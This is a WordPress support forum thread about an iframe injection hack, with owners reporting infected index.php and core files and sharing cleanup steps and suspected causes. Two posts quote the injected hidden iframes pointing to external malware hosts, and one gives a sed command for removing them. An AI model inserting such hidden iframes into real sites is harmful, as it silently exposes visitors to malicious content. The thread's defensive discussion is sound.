iFrame Hack on Several WP Sites (39 posts)

  1. WebFadds
    Posted 7 years ago #

    Hello -

    This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.

    The specfic hack code is:
    <iframe src="http://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden"></iframe>

    This code often overwrites the ending php tags in the file and thus brings the site down.

    I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:

    • Gauge how often it's happening
    • Share solutions
    • Expose the culprits, if possible
    • Alert WP team so they can review possible core level security measures

    As to remedies and security measures to take, the other threads have given some good advise, and I plan to sweep my machine and those of other team members with FTP access (could be virus attached to our systems), check recent plugins, scan for virus' on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do same.

    Here are the other useful threads I have found:

    - Scott

  2. WebFadds
    Posted 7 years ago #

    Hello -

    UPDATE: I have had this problem now on abou 5 sites in the last week, and also discovered iframe insertion hack in the default-filters.php file in the wp-includes file.

    All team members have swept their own PCs and not found anything related.

    We are proceeding to sweep hosting servers and change FTP passwords.

    - Scott

  3. WebFadds
    Posted 7 years ago #

    Hello -

    Good news all... one of our colleagues in the battle has programmed a new plugin, which specifically scans and checks for iframes:
    http://wordpress.org/extend/plugins/antivirus/ - released 6/18

    I am using it and will report here. Your experiences and reports will help too.

    - Scott

  4. gariben
    Posted 7 years ago #

    definitely a FTP password hack.

    I think most people who were hacked had Adobe Reader 8.0 and using FileZilla

  5. WebFadds
    Posted 7 years ago #

    Hi Gariben -

    I have FileZilla, but was not using it. Was using Fetch (a Mac based FTP program). Why do you think Adobe Reader 8.0 was involved?

    UPDATE: After cleaning the index.php files on the infected systems, changing passwords, and installing the antivirus plugin reported above, have had no more incidents of the attack.

    - Scott

  6. Junglefrog
    Posted 7 years ago #

    I had the same issue just today and have just removed all the iframe stuff from my index.phh files and also on the default-filters.php. Site is back up now, but I have a question concerning one of the index files. On wp-content/themes there is a index.php and the only thing it says (after removing the iframe line) is "Silence is golden". Now I suspect that is a practical joke of whoever comes up with this stuff, but just to be sure... can I delete the entire index.php with that line in it?

    O and btw; I use Cyberduck...

  7. The semi-empty index.php is there to prevent people from seeing what's in your theme directory. A blank index.php works just as well, but if you remove it, it might cause a security issue.

    In other words, the "Silence" part is official. It's what's there in WordPress too. :)

  8. Junglefrog
    Posted 7 years ago #

    Thanks Otto! See that is something I didn't know... Good thing I didn't remove it then...
    What I did notice is that I all of a sudden have the letters 'f' on top of my weblog... How did it get there and how do I remove it? Not sure where to look and I'm also not sure if this is related to the problem with the index....

  9. The f is probably just some text somewhere at the bottom of a file. Look in the theme files, as well as any files you may have edited recently.

  10. Junglefrog
    Posted 7 years ago #

    My site is hacked again but I can't seem to be able to solve it!! I've changed all the index.php files and a couple of others as well. The only thing I can see is that there seems to be an index.html file that is also changed. I don't know how to read or change html and am also not sure if that is causing the issue, but it is driving me insane!! Hope someone can help me out here on what to do!

  11. whooami
    Posted 7 years ago #

    you MUST change your ftp password, junglefrog

    and as for editing .html files -- you can edit that in a plain text editor.

  12. b-rad
    Posted 7 years ago #

    If someone could break into your site via FTP why would they make such minor changes when they could run roughshod and change things all over the place. I don't buy the FTP explanation.

  13. rmang
    Posted 7 years ago #

    This type of FTP hack is quite common these days. In almost every case it is an infected PC (with malware) that collects FTP u/p information from FTP programs on the PC. This data is transmitted to the hacker network, that then runs bots to insert iframe malicious code in index* pages, .htaccess, main* pages, etc... all automatically.

    Run a full a/v scan, and then download and run malwarebytes.org software once it's updated on any PC that might have your FTP u/p stored in an FTP program (including designers, developers, SEO, outsource companies, etc...)

  14. Junglefrog
    Posted 7 years ago #

    I have changed all my passwords, added antivirus protection and well, it still happened. I changed everything again. It is fixed now; apparently there was also something changed in a configuration file. But it's sorted. I have a mac and not a pc.
    Other then myself no one has the passwords... Fingers crossed..

  15. whooami
    Posted 7 years ago #

    I have a mac ...

    interesting. Ive cleaned up about 15 sites now where the primary user was on a mac.

  16. sxcnelson
    Posted 7 years ago #

    I am also facing the same problem from past one week.I found iframe code in many files like index.php,default-filters.php.I removed and reimstalled WP and still the problem is there.I have aslo installed antivirus plugin but still have problems.Any permanent solution to this problem.Any help would be highly appreciated.

  17. whooami
    Posted 7 years ago #


    please understand that NOT all "iframe hacks" are created equal. Some are potentially wordpress specific but a good deal are not.

    Additionally, it's a widespread issue, bluehost sites, godaddy sites, hostgator.. you name it, theyve seen iframe exploits.

    Here's a few things to consider when trying to determine potential causes:

    Do you have other stuff in your web space besides wordpress? Do files in there have the same iframes? Are multiple files affected? Like ALL files that have the word "index" in them? Or "default"? Or "home"?

    People that write wordpress specific hacks know that the wp-content/index.php doesnt typically get displayed in a browser, or that index.html in that one plugin's directory. So those files are not typically changed if its wordpress specific.

    On the other hand, gumblar-type attacks,


    write the iframe code to all the index.* files and all the home.* files, regardless of the file's location.

    If you have THAT sort of problem, you MUST scan any and all local machines that access the site using an ftp client, for malware. MUST MUST MUST. That means your machine at work, etc..

    You MUST change your ftp password.

    And for those of you using Internet cafes or kiosks -- bad idea.

    You MUST make sure your local machines are current on their software - and that any security patches have been applied.

    yadda yadda ..

    Ive written this so many times my fingers are raw.


  18. sxcnelson
    Posted 7 years ago #

    Thanks for such a detailed explanation whooami

    I have two ftp acccounts one for wp and other for vbulletin.I found that both the scripts have been attacked by same iframe.Now I have started to scan my pc for virus,malwares etc.Also I cant change password from cpanel so I have requested my webhost to allow me to change passwords from now onwards.I will report in here as i proceed.

  19. sitesecure
    Posted 7 years ago #

    If you are having trouble removing the scripts from your pages and/or getting your site back into Google's good graces, you might want to check out http://www.iframehack.com . Their blog provides quite a bit of information on the hack, including a list of the domains that these hidden iframes are directing traffic to, and provide a service that removes the malicious content from all of the pages on your site that were affected by the virus/trojan and assists with getting the site reincluded in Google results and having the "attack site" label removed.

    Hope this helps someone!

  20. gariben
    Posted 7 years ago #

    what the heck.. no advertisement please.

    Help out the community not help yourself

  21. parambyte
    Posted 7 years ago #

    hello. i am being stuck with the same virus. it places an iframe code connecting to some site called mega-statistic (dot) org

    I use a barely one month old Mac running Leopard (if this helps solve the problem)
    FTP using CyberDuck

    my coders use older Windows based PCs ((if this helps solve the problem))

    my coders ALSO use Ubuntu.

    the code was only found on the index.php of my theme (ndesign studio's itheme)

    the code is this:

    <iframe src="http://mega-statistic.org/1/in.cgi?2" width="0" height="0" frameborder="0"></iframe>

    interesting this is, my server host asked me to place two files called http://ftp.allow and http://ftp.deny to restrict ftp access to certain defined IP addresses only. still this problem happened.

    do you think there is an invisible malware code installer now residing on the server (my root directory et al) itself? what do you guys think?

  22. parambyte
    Posted 7 years ago #

    also, I am not a programmer, just a cinematographer, but was wondering if its possible to run a small command which will automatically check and clean all the files on my server? especially since I HAVE identified the line of abusive code?

    almost like a phpBB admin utility?

    would that be a fast way to check the files?

  23. bh_WP_fan
    Posted 7 years ago #

    If you happen to have ssh access, you can remove it using that.
    You'd want to make a backup of your files first just in case something gets messed up, then the command would be something like this:

    find ./public_html/ -type f -exec sed -i 's/<iframe.*mega-statistic.org*iframe>//g' {} \;

    Not all WordPress themes work with every version of WordPress. Yours may have become outdated and should be removed or upgraded.
    Every plugin is different and some of the old ones may cause problems, so make sure you choose recent plugins and only install ones which you need.

    Read the following for tips to assist with cleaning up hackers code and keeping your site more secure:


  24. parambyte
    Posted 7 years ago #

    thanks. am trying to upgrade my wp and the theme as well!

  25. msephton
    Posted 7 years ago #

    Thanks to bh_WP_fan, I do not use wordpress but was looking for a good solution to this problem.

  26. Andrey "Rarst" Savchenko
    Posted 6 years ago #

    Got hit by similar iframe attack today.

    1. Got iframe inserts in root index.php (possibly more, quickly overwrote with clean WP install)

    2. Got hidden and very obscured PHP backdoor in WP plugins dir, "blog" sub-dir. Check for this people! I would've missed it if I wasn't very thorough and checking everything few times - it didn't show in installed plugins.

    What can I say about method:
    1. There was no FTP involved, FTP log is absolutely clean as far as it goes.
    2. I don't believe my home PC was compromised (confident me).
    3. I had found actual intrusion in access log. How it went (as far as I can tell):
    - hacker came from online service that looks for sites on same server (now I am worried about server having hole)
    - blog home page loaded
    - wp-login seems typed by hand and suddenly he is in admin
    - manually uploads and activates backdoor plugin
    - briefly checks plugin few hours later from another ip

    Log fragment for those who want to take a look:

    Weirdest part - it seems hacker just saw my blog for the first time, no previous visits, no poking around, no bruteforce attempts I can see. He just came by looking for site on specific server and somehow just logged in.

    My conclusion - this was purely WP attack, hacker made beeline for WP login and he knew exactly what was he doing with that plugin.

    Question is - where the heck is hole, in WP or in server. :(

  27. Andrey "Rarst" Savchenko
    Posted 6 years ago #


    Today I caught login attempt from hacker in exactly same way, IP block prevented him from going into admin.

    Half an hour later my database disappeared. :(

  28. alndavis
    Posted 6 years ago #


    Is your server on hostgator by any chance?

  29. Andrey "Rarst" Savchenko
    Posted 6 years ago #


    Nope, but there was similar hack in same time frame at hostgator. Came up in comments about situation at my blog.

    As for my situation support confirmed that hacker had earlier overtaken another site on server (via exploit on outdated WP version) and from there he went cracking whatever else on server he saw.

  30. xinfo
    Posted 6 years ago #

    even i faced this problem , well it not wordpress or web hosting company problem , it's user system problem

    user system have malware

    1,you have clean it with malwarebytes

    2, and change the password

    keep in mind other theme which is not active in the site also attacked so you have clean all the theme which is also not active .

Topic Closed

This topic has been closed to new replies.

About this Topic